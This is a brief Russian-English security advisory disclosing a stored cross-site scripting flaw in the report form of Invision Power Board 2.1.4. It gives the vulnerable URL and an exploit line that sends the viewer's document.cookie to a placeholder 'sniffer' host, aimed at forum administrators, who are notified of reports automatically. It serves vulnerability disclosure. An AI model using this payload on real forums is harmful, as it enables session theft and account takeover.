Advisory: Active XSS in Invision Power Board 2.1.4

Уязвимость/Vulnerability: Межсайтовый скриптинг/Cross Site Scripting

Нет фильтрации входящих данных. Возможно проведение атаки межсайтовый скриптинг, отослав в форме жалобы на сообщение запрос вида: "<script>alert()</script>". С помощью данной атаки возможна утечка конфиденциальных данных пользователя на сторонний сервер.

Форма находится по адресу http://forum/index.php?act=report&t=123&p=123&st=0

Exploit: <script>img = new Image(); img.src = "http://sniffer/file.php?"+document.cookie;</script>

P.S. Далее у всей администрации форума, автоматически появится уведомление о жалобе.